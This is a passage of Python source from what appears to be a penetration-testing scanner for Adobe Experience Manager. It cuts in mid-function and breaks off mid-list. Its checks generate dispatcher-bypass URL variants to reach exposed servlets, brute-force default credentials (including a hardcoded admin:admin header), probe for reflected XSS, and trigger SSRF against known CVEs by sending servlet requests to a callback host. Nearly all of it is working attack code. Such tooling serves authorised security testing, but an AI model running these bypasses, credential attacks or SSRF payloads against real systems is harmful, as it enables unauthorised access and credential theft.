error('Exception while performing a check', check='create_new_nodes2', url=url)
return results
@register('loginstatus_servlet')
def exposed_loginstatus_servlet(base_url, my_host, debug=False, proxy=None):
global CREDS
r = random_string(3)
LOGINSTATUS = itertools.product(('/system/sling/loginstatus', '///system///sling///loginstatus'),
('.json', '.css', '.ico', '.png', '.gif', '.html', '.js', '.json/{0}.1.json',
'.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.png',
'.json;%0a{0}.ico', '...4.2.1...json'))
LOGINSTATUS = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in LOGINSTATUS)
results = []
for path in LOGINSTATUS:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'authenticated=' in str(resp.content):
f = Finding('LoginStatusServlet', url,
'LoginStatusServlet is exposed, it allows to bruteforce credentials. '
'You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.')
results.append(f)
for creds in CREDS:
headers = {'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)
if 'authenticated=true' in str(resp.content):
f = Finding('AEM with default credentials', url,
'AEM with default credentials "{0}".'.format(creds))
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_loginstatus_servlet', url=url)
return results
#@register('currentuser_servlet')
def exposed_currentuser_servlet(base_url, my_host, debug=False, proxy=None):
global CREDS
r = random_string(3)
CURRENTUSER = itertools.product(('/libs/granite/security/currentuser', '///libs///granite///security///currentuser'),
('.json', '.css', '.ico', '.png', '.gif', '.html', '.js', '.json?{0}.css',
'.json/{0}.1.json', '.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.js',
'.json;%0a{0}.ico', '...4.2.1...json'))
CURRENTUSER = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in CURRENTUSER)
results = []
for path in CURRENTUSER:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'authorizableId' in str(resp.content):
f = Finding('CurrentUserServlet', url,
'CurrentUserServlet is exposed, it allows to bruteforce credentials. '
'You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.')
results.append(f)
for creds in CREDS:
headers = {'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)
if 'anonymous' not in str(resp.content):
f = Finding('AEM with default credentials', url,
'AEM with default credentials "{0}".'.format(creds))
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_currentuser_servlet', url=url)
return results
@register('userinfo_servlet')
def exposed_userinfo_servlet(base_url, my_host, debug=False, proxy=None):
global CREDS
r = random_string(3)
USERINFO = itertools.product(('/libs/cq/security/userinfo', '///libs///cq///security///userinfo'),
('.json', '.css', '.ico', '.png', '.gif', '.html', '.js',
'.json?{0}.css', '.json/{0}.1.json',
'.json;%0a{0}.css', '.json;%0a{0}.html',
'.json;%0a{0}.ico', '...4.2.1...json'))
USERINFO = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in USERINFO)
results = []
for path in USERINFO:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'userID' in str(resp.content):
f = Finding('UserInfoServlet', url,
'UserInfoServlet is exposed, it allows to bruteforce credentials. '
'You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.')
results.append(f)
for creds in CREDS:
headers = {'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)
if 'anonymous' not in str(resp.content):
f = Finding('AEM with default credentials', url,
'AEM with default credentials "{0}".'.format(creds))
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_userinfo_servlet', url=url)
return results
@register('felix_console')
def exposed_felix_console(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
FELIXCONSOLE = itertools.product(('/system/console/bundles', '///system///console///bundles'),
('', '.json', '.1.json', '.4.2.1...json', '.css', '.ico', '.png', '.gif', '.html', '.js',
';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.png', '.json;%0a{0}.ico', '.servlet/{0}.css',
'.servlet/{0}.js', '.servlet/{0}.html', '.servlet/{0}.ico'))
FELIXCONSOLE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in FELIXCONSOLE)
results = []
for path in FELIXCONSOLE:
url = normalize_url(base_url, path)
headers = {'Authorization': 'Basic YWRtaW46YWRtaW4='}
try:
resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'Web Console - Bundles' in str(resp.content):
f = Finding('FelixConsole', url,
'Felix Console is exposed, you may get RCE by installing OSGI bundle. '
'See - https://github.com/0ang3el/aem-rce-bundle')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_felix_console', url=url)
return results
@register('wcmdebug_filter')
def exposed_wcmdebug_filter(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
WCMDEBUG = itertools.product(('/', '/content', '/content/dam'),
('.json', '.1.json', '...4.2.1...json', '.json/{0}.css',
'.json/{0}.html', '.json/{0}.ico', '.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.ico'),
('?debug=layout',))
WCMDEBUG = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in WCMDEBUG)
results = []
for path in WCMDEBUG:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'res=' in str(resp.content) and 'sel=' in str(resp.content):
f = Finding('WCMDebugFilter', url,
'WCMDebugFilter exposed and might be vulnerable to reflected XSS (CVE-2016-7882). '
'See - https://medium.com/@jonathanbouman/reflected-xss-at-philips-com-e48bf8f9cd3c')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_wcmdebug_filter', url=url)
return results
@register('wcmsuggestions_servlet')
def exposed_wcmsuggestions_servlet(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
WCMSUGGESTIONS = itertools.product(('/bin/wcm/contentfinder/connector/suggestions', '///bin///wcm///contentfinder///connector///suggestions'),
('.json', '.css', '.html', '.ico', '.png', '.gif', '.json/{0}.1.json',
'.json;%0a{0}.css', '.json/{0}.css', '.json/{0}.ico',
'.json/{0}.html', '...4.2.1...json'),
('?query_term=path%3a/&pre=<1337abcdef>&post=yyyy',))
WCMSUGGESTIONS = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in WCMSUGGESTIONS)
results = []
for path in WCMSUGGESTIONS:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and '<1337abcdef>' in str(resp.content):
f = Finding('WCMSuggestionsServlet', url,
'WCMSuggestionsServlet exposed and might result in reflected XSS. '
'See - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=96')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_wcmsuggestions_servlet', url=url)
return results
@register('crxde_crx')
def exposed_crxde_crx(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
CRXDELITE = itertools.product(('/crx/de/index.jsp', '///crx///de///index.jsp'),
('', ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.js', ';%0a{0}.ico', '?{0}.css',
'?{0}.html', '?{0}.ico'))
CRXDELITE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in CRXDELITE)
CRX = itertools.product(('/crx/explorer/browser/index.jsp', '///crx///explorer///browser///index.jsp'),
('', ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico', '?{0}.css',
'?{0}.html', '?{0}.ico'))
CRX = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in CRX)
CRXSEARCH = itertools.product(('/crx/explorer/ui/search.jsp', '/crx///explorer///ui///search.jsp'),
('', ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico',
'?{0}.css', '?{0}.html', '?{0}.ico'))
CRXSEARCH = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in CRXSEARCH)
CRXNAMESPACE = itertools.product(('/crx/explorer/ui/namespace_editor.jsp', '///crx/explorer///ui///namespace_editor.jsp'),
('', ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico', '?{0}.css',
'?{0}.html', '?{0}.ico')
)
CRXNAMESPACE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in CRXNAMESPACE)
PACKMGR = itertools.product(('/crx/packmgr/index.jsp', '///crx///packmgr///index.jsp'),
('', ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico',
'?{0}.css', '?{0}.html', '?{0}.ico')
)
PACKMGR = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in PACKMGR)
results = []
for path in itertools.chain(CRXDELITE, CRX, CRXSEARCH, CRXNAMESPACE, PACKMGR):
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and ('CRXDE Lite' in str(resp.content) or 'Content Explorer' in str(resp.content) or
'CRX Package Manager' in str(resp.content) or 'Search for:' in str(resp.content) or
'Namespace URI' in str(resp.content)) :
f = Finding('CRXDE Lite/CRX', url, 'Sensitive information might be exposed. Check manually.')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_crxde_crx', url=url)
return results
#@register('reports')
def exposed_reports(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
DISKUSAGE = itertools.product(('/etc/reports/diskusage.html', '///etc/reports///diskusage.html'),
('/{0}.css', '/{0}.ico', ';%0a{0}.css', ';%0a{0}.ico'))
DISKUSAGE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in DISKUSAGE)
results = []
for path in DISKUSAGE:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and ('Disk Usage' in str(resp.content)):
f = Finding('Disk Usage report', url, 'Disk Usage report are exposed.')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_reports', url=url)
return results
@register('salesforcesecret_servlet')
def ssrf_salesforcesecret_servlet(base_url, my_host, debug=False, proxy=None):
global token, d
results = []
SALESFORCESERVLET1 = itertools.product(
(
'/libs/mcm/salesforce/customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
'///libs///mcm///salesforce///customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
'/libs/mcm/salesforce/customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23',
'///libs///mcm///salesforce///customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23'
),
(
'.json', '.1.json', '.4.2.1...json', '.html'
)
)
SALESFORCESERVLET1 = list(pair[0].format(pair[1]) for pair in SALESFORCESERVLET1)
SALESFORCESERVLET2 = itertools.product(
(
'/libs/mcm/salesforce/customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
'///libs///mcm///salesforce///customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
'/libs/mcm/salesforce/customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23',
'///libs///mcm///salesforce///customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23'
),
(
'.html/{0}.1.json', '.html/{0}.4.2.1...json', '.html/{0}.css', '.html/{0}.js', '.html/{0}.png', '.html/{0}.bmp',
'.html;%0a{0}.css', '.html;%0a{0}.js', '.json;%0a{0}.css', '.html;%0a{0}.png', '.json;%0a{0}.png',
'.json;%0a{0}.html', '.json/{0}.css', '.json/{0}.js', '.json/{0}.png', '.json/a.gif', '.json/{0}.ico', '.json/{0}.html'
)
)
cache_buster = random_string()
SALESFORCESERVLET2 = list(pair[0].format(pair[1].format(cache_buster)) for pair in SALESFORCESERVLET2)
SALESFORCESERVLET3 = itertools.product(
(
'/libs/mcm/salesforce/customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
'///libs///mcm///salesforce///customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
'/libs/mcm/salesforce/customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23',
'///libs///mcm///salesforce///customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23'
),
(
'.{0}.css', '.{0}.js', '.{0}.png', '.{0}.ico', '.{0}.bmp', '.{0}.gif', '.{0}.html'
)
)
cache_buster = randint(1, 2**12)
SALESFORCESERVLET3 = list(pair[0].format(pair[1].format(cache_buster)) for pair in SALESFORCESERVLET3)
for path in itertools.chain(SALESFORCESERVLET1, SALESFORCESERVLET2, SALESFORCESERVLET3):
url = normalize_url(base_url, path)
encoded_orig_url = (base64.b16encode(url.encode())).decode()
back_url = 'http://{0}/{1}/salesforcesecret/{2}/'.format(my_host, token, encoded_orig_url)
url = url.format(back_url)
try:
http_request(url, proxy=proxy, debug=debug)
except:
if debug:
error('Exception while performing a check', check='ssrf_salesforcesecret_servlet', url=url)
time.sleep(10)
if 'salesforcesecret' in d:
u = base64.b16decode(d.get('salesforcesecret')[0]).decode()
f = Finding('SalesforceSecretServlet', u,
'SSRF via SalesforceSecretServlet (CVE-2018-5006) was detected. '
'See - https://helpx.adobe.com/security/products/experience-manager/apsb18-23.html')
results.append(f)
return results
@register('reportingservices_servlet')
def ssrf_reportingservices_servlet(base_url, my_host, debug=False, proxy=None):
global token, d
results = []
REPOSTINGSERVICESSERVLET1 = (
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet?url={0}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.json?url={0}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.4.2.1...json?url={0}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.1.json?url={0}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json?url={0}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.4.2.1...json?url={0}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.1.json?url={0}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet?url={0}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.json?url={0}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.4.2.1...json?url={0}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.1.json?url={0}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json?url={0}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.4.2.1...json?url={0}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.1.json?url={0}%23/api1.omniture.com/a&q=a'
)
REPOSTINGSERVICESSERVLET2 = (
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet;%0a{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet;%0a{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet;%0a{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet;%0a{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet;%0a{0}.gif?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json/{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json/{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json/{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json/{0}.ico?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json/{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a{0}.bmp?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet;%0a{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet;%0a{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet;%0a{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq/contentinsight///proxy///reportingservices.json.GET.servlet;%0a{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq/contentinsight///proxy///reportingservices.json.GET.servlet;%0a{0}.gif?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json/{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json/{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json/{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json/{0}.ico?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json/{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json;%0a{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json;%0a{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json;%0a{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json;%0a{0}.ico?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json;%0a{0}.png?url={{0}}%23/api1.omniture.com/a&q=a'
)
cache_buster = random_string()
REPOSTINGSERVICESSERVLET2 = (path.format(cache_buster) for path in REPOSTINGSERVICESSERVLET2)
REPOSTINGSERVICESSERVLET3 = (
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.ico?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.bmp?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.ico?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.bmp?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.js?url={{0}}%23/api1.omniture.com/a&q=a'
)
cache_buster = randint(0, 2**12)
REPOSTINGSERVICESSERVLET3 = (path.format(cache_buster) for path in REPOSTINGSERVICESSERVLET3)
for path in itertools.chain(REPOSTINGSERVICESSERVLET1, REPOSTINGSERVICESSERVLET2, REPOSTINGSERVICESSERVLET3):
url = normalize_url(base_url, path)
encoded_orig_url = (base64.b16encode(url.encode())).decode()
back_url = 'http://{0}/{1}/reportingservices/{2}/'.format(my_host, token, encoded_orig_url)
url = url.format(back_url)
try:
http_request(url, proxy=proxy, debug=debug)
except:
if debug:
error('Exception while performing a check', check='ssrf_reportingservices_servlet', url=url)
time.sleep(10)
if 'reportingservices' in d:
u = base64.b16decode(d.get('reportingservices')[0]).decode()
f = Finding('ReportingServicesServlet', u,
'SSRF via SalesforceSecretServlet (CVE-2018-12809) was detected. '
'See - https://helpx.adobe.com/security/products/experience-manager/apsb18-23.html')
results.append(f)
return results
@register('sitecatalyst_servlet')
def ssrf_sitecatalyst_servlet(base_url, my_host, debug=False, proxy=None):
global token, d
results = []
SITECATALYST1 = (
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.html?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.4.2.1...json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.1.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/a.1.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/a.4.2.1...json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.html?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.1.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.4.2.1...json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json/a.html?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json/a.1.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json/a.4.2.1...json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy'
)
SITECATALYST2 = (
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet/{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet/{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet/{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet/{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet/{0}.bmp?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet;%0a{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet;%0a{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet;%0a{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet;%0a{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/{0}.ico?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json;%0a{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json;%0a{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json;%0a{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json;%0a{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet///{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet///{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet///{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet///{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet///{0}.bmp?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet;%0a{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet;%0a{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet;%0a{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet;%0a{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json///{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json///{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json///{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json///{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json///{0}.ico?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json;%0a{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json;%0a{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json;%0a{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json;%0a{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy'
)
cache_buster = random_string()
SITECATALYST2 = (path.format(cache_buster) for path in SITECATALYST2)
SITECATALYST3 = (
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
